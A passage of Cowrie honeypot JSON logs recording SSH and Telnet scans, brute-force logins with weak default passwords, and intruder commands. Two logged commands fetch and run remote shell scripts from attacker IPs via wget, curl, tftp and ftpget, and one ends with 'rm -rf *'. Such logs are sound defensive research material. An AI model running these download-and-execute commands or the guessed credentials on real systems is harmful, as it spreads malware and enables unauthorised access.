a2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T16:32:22.728491Z","src_ip":"212.227.125.160","session":"65b6a1684c25"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T16:32:23.074844Z","src_ip":"212.227.125.160","session":"65b6a1684c25"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T16:32:23.190147Z","session":"65b6a1684c25"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42420,"dst_ip":"1.2.3.4","dst_port":22,"session":"d6de7c8dff2c","protocol":"ssh","message":"New connection: 212.227.125.160:42420 (1.2.3.4:22) [session: d6de7c8dff2c]","sensor":"my-vps","timestamp":"2025-08-26T16:32:26.256914Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:32:26.357433Z","src_ip":"212.227.125.160","session":"d6de7c8dff2c"}
{"eventid":"cowrie.session.connect","src_ip":"205.210.31.89","src_port":65334,"dst_ip":"1.2.3.4","dst_port":22,"session":"96946cff1551","protocol":"ssh","message":"New connection: 205.210.31.89:65334 (1.2.3.4:22) [session: 96946cff1551]","sensor":"my-vps","timestamp":"2025-08-26T16:32:46.457036Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-08-26T16:32:47.236482Z","src_ip":"205.210.31.89","session":"96946cff1551"}
{"eventid":"cowrie.client.kex","hassh":"dd9bcf093c355da7000132131cb36fd0","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-rsa-cert-v00@openssh.com","ssh-dss-cert-v00@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-ripemd160-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","hmac-md5","hmac-sha1","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0","sensor":"my-vps","timestamp":"2025-08-26T16:32:48.513731Z","src_ip":"205.210.31.89","session":"96946cff1551"}
{"eventid":"cowrie.session.closed","duration":"9.5","message":"Connection lost after 9.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:32:55.934422Z","src_ip":"205.210.31.89","session":"96946cff1551"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:33:32.612851Z","src_ip":"212.227.125.160","session":"65b6a1684c25"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":30544,"dst_ip":"1.2.3.4","dst_port":22,"session":"769394a67947","protocol":"ssh","message":"New connection: 80.94.95.112:30544 (1.2.3.4:22) [session: 769394a67947]","sensor":"my-vps","timestamp":"2025-08-26T16:34:05.386171Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T16:34:05.386945Z","src_ip":"80.94.95.112","session":"769394a67947"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T16:34:05.417324Z","src_ip":"80.94.95.112","session":"769394a67947"}
{"eventid":"cowrie.login.failed","username":"admin","password":"r4e3w2q1","message":"login attempt [admin/r4e3w2q1] failed","sensor":"my-vps","timestamp":"2025-08-26T16:34:05.627039Z","src_ip":"80.94.95.112","session":"769394a67947"}
{"eventid":"cowrie.login.failed","username":"admin","password":"quake3","message":"login attempt [admin/quake3] failed","sensor":"my-vps","timestamp":"2025-08-26T16:34:06.661341Z","src_ip":"80.94.95.112","session":"769394a67947"}
{"eventid":"cowrie.login.failed","username":"admin","password":"qqqqqqqqqq","message":"login attempt [admin/qqqqqqqqqq] failed","sensor":"my-vps","timestamp":"2025-08-26T16:34:07.693900Z","src_ip":"80.94.95.112","session":"769394a67947"}
{"eventid":"cowrie.login.failed","username":"admin","password":"qazwsxedc1","message":"login attempt [admin/qazwsxedc1] failed","sensor":"my-vps","timestamp":"2025-08-26T16:34:08.726269Z","src_ip":"80.94.95.112","session":"769394a67947"}
{"eventid":"cowrie.login.failed","username":"admin","password":"qazplm","message":"login attempt [admin/qazplm] failed","sensor":"my-vps","timestamp":"2025-08-26T16:34:09.759815Z","src_ip":"80.94.95.112","session":"769394a67947"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:34:10.792217Z","src_ip":"80.94.95.112","session":"769394a67947"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":61504,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9d783b06795","protocol":"ssh","message":"New connection: 217.72.205.35:61504 (1.2.3.4:22) [session: b9d783b06795]","sensor":"my-vps","timestamp":"2025-08-26T16:37:37.297008Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:37:37.298529Z","src_ip":"217.72.205.35","session":"b9d783b06795"}
{"eventid":"cowrie.session.connect","src_ip":"45.153.34.78","src_port":54762,"dst_ip":"1.2.3.4","dst_port":22,"session":"3bed7863e4fa","protocol":"ssh","message":"New connection: 45.153.34.78:54762 (1.2.3.4:22) [session: 3bed7863e4fa]","sensor":"my-vps","timestamp":"2025-08-26T16:37:50.169688Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T16:37:50.170380Z","src_ip":"45.153.34.78","session":"3bed7863e4fa"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-26T16:37:50.338946Z","src_ip":"45.153.34.78","session":"3bed7863e4fa"}
{"eventid":"cowrie.login.success","username":"root","password":"openelec","message":"login attempt [root/openelec] succeeded","sensor":"my-vps","timestamp":"2025-08-26T16:37:50.722101Z","src_ip":"45.153.34.78","session":"3bed7863e4fa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T16:37:50.831042Z","src_ip":"45.153.34.78","session":"3bed7863e4fa"}
{"eventid":"cowrie.command.input","input":"cd /tmp; wget http://2.58.113.219/wget.sh -O- |sh;curl -o http://2.58.113.219/wget.sh -O-|sh; chmod 777 wget.sh; sh wget.sh;\\n","message":"CMD: cd /tmp; wget http://2.58.113.219/wget.sh -O- |sh;curl -o http://2.58.113.219/wget.sh -O-|sh; chmod 777 wget.sh; sh wget.sh;\\n","sensor":"my-vps","timestamp":"2025-08-26T16:37:50.831813Z","src_ip":"45.153.34.78","session":"3bed7863e4fa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/9545ae2bfbec70de226d703f7d68c6ce44996c8500402722962fd86de925d2c2","size":161,"shasum":"9545ae2bfbec70de226d703f7d68c6ce44996c8500402722962fd86de925d2c2","duplicate":false,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/9545ae2bfbec70de226d703f7d68c6ce44996c8500402722962fd86de925d2c2 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:37:50.852737Z","src_ip":"45.153.34.78","session":"3bed7863e4fa"}
{"eventid":"cowrie.session.file_download","url":"http://2.58.113.219/wget.sh","outfile":"var/lib/cowrie/downloads/6f9f384713dfdcd41d5bb67d3116b93a274670bcc88859b8ee832cf75d19d108","shasum":"6f9f384713dfdcd41d5bb67d3116b93a274670bcc88859b8ee832cf75d19d108","sensor":"my-vps","timestamp":"2025-08-26T16:37:50.866150Z","message":"Downloaded URL (http://2.58.113.219/wget.sh) with SHA-256 6f9f384713dfdcd41d5bb67d3116b93a274670bcc88859b8ee832cf75d19d108 to var/lib/cowrie/downloads/6f9f384713dfdcd41d5bb67d3116b93a274670bcc88859b8ee832cf75d19d108","src_ip":"45.153.34.78","session":"3bed7863e4fa"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:37:54.871570Z","src_ip":"45.153.34.78","session":"3bed7863e4fa"}
{"eventid":"cowrie.session.connect","src_ip":"47.109.94.245","src_port":42978,"dst_ip":"1.2.3.4","dst_port":22,"session":"de285019bc61","protocol":"ssh","message":"New connection: 47.109.94.245:42978 (1.2.3.4:22) [session: de285019bc61]","sensor":"my-vps","timestamp":"2025-08-26T16:38:28.144064Z"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:38:36.374623Z","src_ip":"47.109.94.245","session":"de285019bc61"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38160,"dst_ip":"1.2.3.4","dst_port":23,"session":"b19cd55041d5","protocol":"telnet","message":"New connection: 212.227.235.229:38160 (1.2.3.4:23) [session: b19cd55041d5]","sensor":"my-vps","timestamp":"2025-08-26T16:38:52.656651Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T16:38:53.569640Z","src_ip":"212.227.235.229","session":"b19cd55041d5"}
{"eventid":"cowrie.session.connect","src_ip":"193.32.162.145","src_port":47372,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c4fe965f134","protocol":"ssh","message":"New connection: 193.32.162.145:47372 (1.2.3.4:22) [session: 9c4fe965f134]","sensor":"my-vps","timestamp":"2025-08-26T16:38:54.028744Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T16:38:54.030208Z","src_ip":"193.32.162.145","session":"9c4fe965f134"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T16:38:54.060066Z","src_ip":"193.32.162.145","session":"9c4fe965f134"}
{"eventid":"cowrie.login.failed","username":"solana","password":"123solana","message":"login attempt [solana/123solana] failed","sensor":"my-vps","timestamp":"2025-08-26T16:38:54.154742Z","src_ip":"193.32.162.145","session":"9c4fe965f134"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42448,"dst_ip":"1.2.3.4","dst_port":22,"session":"b69ac86377a5","protocol":"ssh","message":"New connection: 212.227.235.229:42448 (1.2.3.4:22) [session: b69ac86377a5]","sensor":"my-vps","timestamp":"2025-08-26T16:38:54.192058Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T16:38:55.046691Z","src_ip":"212.227.235.229","session":"b69ac86377a5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T16:38:55.047339Z","src_ip":"212.227.235.229","session":"b69ac86377a5"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:38:55.187286Z","src_ip":"193.32.162.145","session":"9c4fe965f134"}
{"eventid":"cowrie.session.closed","duration":3.2719802856445312,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:38:55.928560Z","src_ip":"212.227.235.229","session":"b19cd55041d5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38174,"dst_ip":"1.2.3.4","dst_port":23,"session":"edcd8c053ebc","protocol":"telnet","message":"New connection: 212.227.235.229:38174 (1.2.3.4:23) [session: edcd8c053ebc]","sensor":"my-vps","timestamp":"2025-08-26T16:38:56.080706Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Neelam@123","message":"login attempt [root/Neelam@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T16:38:57.480117Z","src_ip":"212.227.235.229","session":"b69ac86377a5"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-26T16:38:57.506433Z","src_ip":"212.227.235.229","session":"edcd8c053ebc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T16:38:57.529338Z","src_ip":"212.227.235.229","session":"edcd8c053ebc"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:38:57.923412Z","src_ip":"212.227.235.229","session":"b69ac86377a5"}
{"eventid":"cowrie.command.input","input":"cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://196.251.87.166/1.sh; curl -O http://196.251.87.166/1.sh; chmod 777 1.sh; sh 1.sh; tftp 196.251.87.166 -c get 1.sh; chmod 777 1.sh; sh 1.sh; tftp -r 3.sh -g 196.251.87.166; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 196.251.87.166 2.sh 2.sh; sh 2.sh; rm -rf 1.sh 1.sh 3.sh 2.sh; rm -rf *","message":"CMD: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://196.251.87.166/1.sh; curl -O http://196.251.87.166/1.sh; chmod 777 1.sh; sh 1.sh; tftp 196.251.87.166 -c get 1.sh; chmod 777 1.sh; sh 1.sh; tftp -r 3.sh -g 196.251.87.166; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 196.251.87.166 2.sh 2.sh; sh 2.sh; rm -rf 1.sh 1.sh 3.sh 2.sh; rm -rf *","sensor":"my-vps","timestamp":"2025-08-26T16:38:59.184119Z","src_ip":"212.227.235.229","session":"edcd8c053ebc"}
{"eventid":"cowrie.session.file_download","url":"http://196.251.87.166/1.sh","outfile":"var/lib/cowrie/downloads/bff314fbbc14981c43feaa5ddf2e48c926cf7902aa030de80a29ccbcd3556ce9","shasum":"bff314fbbc14981c43feaa5ddf2e48c926cf7902aa030de80a29ccbcd3556ce9","sensor":"my-vps","timestamp":"2025-08-26T16:38:59.220351Z","message":"Downloaded URL (http://196.251.87.166/1.sh) with SHA-256 bff314fbbc14981c43feaa5ddf2e48c926cf7902aa030de80a29ccbcd3556ce9 to var/lib/cowrie/downloads/bff314fbbc14981c43feaa5ddf2e48c926cf7902aa030de80a29ccbcd3556ce9","src_ip":"212.227.235.229","session":"edcd8c053ebc"}
{"eventid":"cowrie.session.file_download","url":"http://196.251.87.166/1.sh","outfile":"var/lib/cowrie/downloads/bff314fbbc14981c43feaa5ddf2e48c926cf7902aa030de80a29ccbcd3556ce9","shasum":"bff314fbbc14981c43feaa5ddf2e48c926cf7902aa030de80a29ccbcd3556ce9","sensor":"my-vps","timestamp":"2025-08-26T16:38:59.239290Z","message":"Downloaded URL (http://196.251.87.166/1.sh) with SHA-256 bff314fbbc14981c43feaa5ddf2e48c926cf7902aa030de80a29ccbcd3556ce9 to var/lib/cowrie/downloads/bff314fbbc14981c43feaa5ddf2e48c926cf7902aa030de80a29ccbcd3556ce9","src_ip":"212.227.235.229","session":"edcd8c053ebc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4391d095655768a6e253bdf72fd9f5e57937ceb21c41ebc60838abb0793abf85","size":1633,"shasum":"4391d095655768a6e253bdf72fd9f5e57937ceb21c41ebc60838abb0793abf85","duplicate":false,"duration":"1.9","message":"Closing TTY Log: var/lib/cowrie/tty/4391d095655768a6e253bdf72fd9f5e57937ceb21c41ebc60838abb0793abf85 after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:38:59.397636Z","src_ip":"212.227.235.229","session":"edcd8c053ebc"}
{"eventid":"cowrie.session.closed","duration":3.321279525756836,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:38:59.401911Z","src_ip":"212.227.235.229","session":"edcd8c053ebc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46336,"dst_ip":"1.2.3.4","dst_port":23,"session":"bce976b67b5d","protocol":"telnet","message":"New connection: 212.227.235.229:46336 (1.2.3.4:23) [session: bce976b67b5d]","sensor":"my-vps","timestamp":"2025-08-26T16:41:09.965563Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52308,"dst_ip":"1.2.3.4","dst_port":23,"session":"f30b69c72722","protocol":"telnet","message":"New connection: 212.227.125.160:52308 (1.2.3.4:23) [session: f30b69c72722]","sensor":"my-vps","timestamp":"2025-08-26T16:41:29.399485Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T16:41:29.483943Z","src_ip":"212.227.125.160","session":"f30b69c72722"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T16:41:29.553204Z","src_ip":"212.227.125.160","session":"f30b69c72722"}
{"eventid":"cowrie.session.closed","duration":31.335803270339966,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:41:41.301276Z","src_ip":"212.227.235.229","session":"bce976b67b5d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":21822,"dst_ip":"1.2.3.4","dst_port":22,"session":"88bbc1b7367f","protocol":"ssh","message":"New connection: 212.227.235.229:21822 (1.2.3.4:22) [session: 88bbc1b7367f]","sensor":"my-vps","timestamp":"2025-08-26T16:41:57.031234Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:41:57.032922Z","src_ip":"212.227.235.229","session":"88bbc1b7367f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":22133,"dst_ip":"1.2.3.4","dst_port":22,"session":"e613220f8ce3","protocol":"ssh","message":"New connection: 212.227.235.229:22133 (1.2.3.4:22) [session: e613220f8ce3]","sensor":"my-vps","timestamp":"2025-08-26T16:41:57.159749Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T16:41:57.160983Z","src_ip":"212.227.235.229","session":"e613220f8ce3"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-